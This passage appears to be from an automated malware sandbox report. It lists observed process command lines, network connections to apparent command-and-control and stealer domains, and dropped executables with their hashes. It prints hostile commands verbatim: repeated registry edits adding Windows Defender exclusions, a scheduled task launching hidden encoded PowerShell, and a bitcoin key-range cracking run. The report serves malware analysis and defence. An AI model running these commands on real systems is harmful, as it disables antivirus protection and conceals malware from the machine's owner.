\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\Temp\35748.exe
"C:\Windows\Temp\35748.exe" --coin BTC -m ADDRESSES -t 0 --range 28df28bec40000000:28df28bec80000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe
"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1916 -ip 1916
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 936
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1916 -ip 1916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 948
C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe
"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe
"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"
C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe
"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtNABvddg" /SC once /ST 06:49:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtNABvddg"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.221.208.4.in-addr.arpa | udp |
| BE | 2.17.196.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.196.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.191.110.104.in-addr.arpa | udp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 167.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | affordcharmcropwo.shop | udp |
| US | 172.67.181.34:443 | affordcharmcropwo.shop | tcp |
| US | 8.8.8.8:53 | cleartotalfisherwo.shop | udp |
| US | 104.21.72.132:443 | cleartotalfisherwo.shop | tcp |
| US | 8.8.8.8:53 | 34.181.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.72.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | worryfillvolcawoi.shop | udp |
| US | 172.67.199.191:443 | worryfillvolcawoi.shop | tcp |
| US | 8.8.8.8:53 | enthusiasimtitleow.shop | udp |
| US | 172.67.183.226:443 | enthusiasimtitleow.shop | tcp |
| US | 8.8.8.8:53 | 191.199.67.172.in-addr.arpa | udp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | dismissalcylinderhostw.shop | udp |
| US | 104.21.22.160:443 | dismissalcylinderhostw.shop | tcp |
| US | 8.8.8.8:53 | 226.183.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | productivelookewr.shop | udp |
| US | 172.67.150.207:443 | productivelookewr.shop | tcp |
| US | 8.8.8.8:53 | diskretainvigorousiw.shop | udp |
| DE | 185.172.128.33:8970 | tcp | |
| US | 104.21.23.143:443 | diskretainvigorousiw.shop | tcp |
| US | 8.8.8.8:53 | tolerateilusidjukl.shop | udp |
| US | 8.8.8.8:53 | 160.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.150.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.23.21.104.in-addr.arpa | udp |
| US | 104.21.89.202:443 | tolerateilusidjukl.shop | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | communicationgenerwo.shop | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 104.21.83.19:443 | communicationgenerwo.shop | tcp |
| US | 8.8.8.8:53 | shatterbreathepsw.shop | udp |
| US | 172.67.169.43:443 | shatterbreathepsw.shop | tcp |
| US | 8.8.8.8:53 | pillowbrocccolipe.shop | udp |
| US | 104.21.47.56:443 | pillowbrocccolipe.shop | tcp |
| US | 8.8.8.8:53 | shortsvelventysjo.shop | udp |
| US | 8.8.8.8:53 | 202.89.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.83.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.47.21.104.in-addr.arpa | udp |
| US | 104.21.16.225:443 | shortsvelventysjo.shop | tcp |
| US | 8.8.8.8:53 | incredibleextedwj.shop | udp |
| US | 104.21.86.106:443 | incredibleextedwj.shop | tcp |
| RU | 185.215.113.67:26260 | tcp | |
| US | 8.8.8.8:53 | 225.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | alcojoldwograpciw.shop | udp |
| US | 172.67.157.23:443 | alcojoldwograpciw.shop | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | liabilitynighstjsko.shop | udp |
| US | 8.8.8.8:53 | 106.86.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.157.67.172.in-addr.arpa | udp |
| US | 104.21.44.3:443 | liabilitynighstjsko.shop | tcp |
| US | 8.8.8.8:53 | demonstationfukewko.shop | udp |
| US | 172.67.147.169:443 | demonstationfukewko.shop | tcp |
| US | 8.8.8.8:53 | 3.44.21.104.in-addr.arpa | udp |
| FR | 52.143.157.84:80 | 52.143.157.84 | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| RU | 77.221.151.47:80 | 77.221.151.47 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | 169.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.157.143.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.151.221.77.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | skategirls.org | udp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | realdeepai.org | udp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | jonathantwo.com | udp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.90.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| RU | 5.42.65.67:48396 | tcp | |
| US | 8.8.8.8:53 | 112.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.31.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.65.42.5.in-addr.arpa | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 172.67.188.178:443 | iplogger.com | tcp |
| RU | 193.233.132.234:80 | 193.233.132.234 | tcp |
| US | 104.21.90.14:443 | realdeepai.org | tcp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| US | 8.8.8.8:53 | skategirls.org | udp |
| US | 104.21.31.124:443 | jonathantwo.com | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| US | 8.8.8.8:53 | 178.188.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.242.123.52.in-addr.arpa | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 10.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 193.233.132.167:80 | 193.233.132.167 | tcp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | note.padd.cn.com | udp |
| US | 8.8.8.8:53 | 20.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 106.76.97.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| NL | 82.145.216.15:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.117:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.182.26.185.in-addr.arpa | udp |
| RO | 176.97.76.106:80 | note.padd.cn.com | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.216.20:443 | autoupdate.geo.opera.com | tcp |
| US | 8.8.8.8:53 | download5.operacdn.com | udp |
| US | 104.18.11.89:443 | download5.operacdn.com | tcp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| US | 8.8.8.8:53 | 89.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| US | 8.8.8.8:53 | 45.87.157.20.in-addr.arpa | udp |
| DE | 185.172.128.76:80 | 185.172.128.76 | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | download.iolo.net | udp |
| FR | 143.244.56.51:443 | download.iolo.net | tcp |
| US | 8.8.8.8:53 | 51.56.244.143.in-addr.arpa | udp |
| RU | 77.221.151.47:8080 | tcp | |
| US | 8.8.8.8:53 | svc.iolo.com | udp |
| US | 20.157.87.45:80 | svc.iolo.com | tcp |
| RU | 91.215.85.66:15647 | tcp | |
| US | 8.8.8.8:53 | 66.85.215.91.in-addr.arpa | udp |
| RU | 91.215.85.66:9000 | tcp | |
| US | 8.8.8.8:53 | westus2-2.in.applicationinsights.azure.com | udp |
| US | 20.9.155.145:443 | westus2-2.in.applicationinsights.azure.com | tcp |
| US | 8.8.8.8:53 | 145.155.9.20.in-addr.arpa | udp |
Files
memory/2892-0-0x00000000007F0000-0x0000000000CB2000-memory.dmp
memory/2892-1-0x0000000077144000-0x0000000077146000-memory.dmp
memory/2892-2-0x00000000007F0000-0x0000000000CB2000-memory.dmp
memory/2892-3-0x00000000051C0000-0x00000000051C1000-memory.dmp
memory/2892-8-0x00000000051A0000-0x00000000051A1000-memory.dmp
memory/2892-7-0x00000000051B0000-0x00000000051B1000-memory.dmp
memory/2892-6-0x0000000005190000-0x0000000005191000-memory.dmp
memory/2892-5-0x00000000051F0000-0x00000000051F1000-memory.dmp
memory/2892-4-0x00000000051D0000-0x00000000051D1000-memory.dmp
memory/2892-9-0x0000000005210000-0x0000000005211000-memory.dmp
memory/2892-14-0x00000000007F0000-0x0000000000CB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
| MD5 | 8facf6d258ba6125d842d5e0d5469bfb |
| SHA1 | 4374fc7f57ea001165cdcf36bbc6f6015203ef05 |
| SHA256 | 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854 |
| SHA512 | 41c9e23c7b29c8901bd7fcf3932f44144116faa5505c33e0572d4c2b6ef687ddda8b77559cc4187007abcdb74620d1740c3075b9601c39a700a17f792555de8f |
memory/2452-17-0x00000000009A0000-0x0000000000E62000-memory.dmp
memory/2452-18-0x00000000009A0000-0x0000000000E62000-memory.dmp
memory/2452-20-0x0000000005380000-0x0000000005381000-memory.dmp
memory/2452-19-0x0000000005370000-0x0000000005371000-memory.dmp
memory/2452-21-0x0000000005360000-0x0000000005361000-memory.dmp
memory/2452-22-0x00000000053A0000-0x00000000053A1000-memory.dmp
memory/2452-23-0x0000000005340000-0x0000000005341000-memory.dmp
memory/2452-24-0x0000000005350000-0x0000000005351000-memory.dmp
memory/2452-25-0x00000000053C0000-0x00000000053C1000-memory.dmp
memory/2452-26-0x00000000053B0000-0x00000000053B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
| MD5 | 1c7d0f34bb1d85b5d2c01367cc8f62ef |
| SHA1 | 33aedadb5361f1646cffd68791d72ba5f1424114 |
| SHA256 | e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c |
| SHA512 | 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d |
memory/4660-46-0x0000000000980000-0x00000000009D2000-memory.dmp
memory/4660-47-0x0000000072D50000-0x0000000073500000-memory.dmp
memory/4008-50-0x0000000000400000-0x000000000044C000-memory.dmp
memory/4008-53-0x0000000000400000-0x000000000044C000-memory.dmp
memory/4660-54-0x0000000002D60000-0x0000000004D60000-memory.dmp
memory/4008-55-0x0000000000900000-0x0000000000901000-memory.dmp
memory/4008-56-0x0000000000900000-0x0000000000901000-memory.dmp
memory/4008-57-0x0000000000900000-0x0000000000901000-memory.dmp
memory/4008-58-0x0000000000900000-0x0000000000901000-memory.dmp
memory/4008-59-0x0000000000400000-0x000000000044C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
| MD5 | 31841361be1f3dc6c2ce7756b490bf0f |
| SHA1 | ff2506641a401ac999f5870769f50b7326f7e4eb |
| SHA256 | 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee |
| SHA512 | 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019 |
memory/4660-73-0x0000000072D50000-0x0000000073500000-memory.dmp
memory/2212-78-0x00000000009B0000-0x0000000000C68000-memory.dmp
memory/4640-77-0x0000000000400000-0x0000000000592000-memory.dmp
memory/4640-81-0x0000000072720000-0x0000000072ED0000-memory.dmp
memory/4640-82-0x0000000005250000-0x0000000005260000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
| MD5 | 0c582da789c91878ab2f1b12d7461496 |
| SHA1 | 238bd2408f484dd13113889792d6e46d6b41c5ba |
| SHA256 | a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67 |
| SHA512 | a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a |
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
| MD5 | b22521fb370921bb5d69bf8deecce59e |
| SHA1 | 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea |
| SHA256 | b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158 |
| SHA512 | 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c |
memory/2452-112-0x00000000009A0000-0x0000000000E62000-memory.dmp
memory/1572-113-0x0000000000360000-0x00000000003B2000-memory.dmp
memory/1572-114-0x0000000072720000-0x0000000072ED0000-memory.dmp
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
| MD5 | 20ae0bb07ba77cb3748aa63b6eb51afb |
| SHA1 | 87c468dc8f3d90a63833d36e4c900fa88d505c6d |
| SHA256 | daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d |
| SHA512 | db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2 |
memory/2212-107-0x00000000009B0000-0x0000000000C68000-memory.dmp
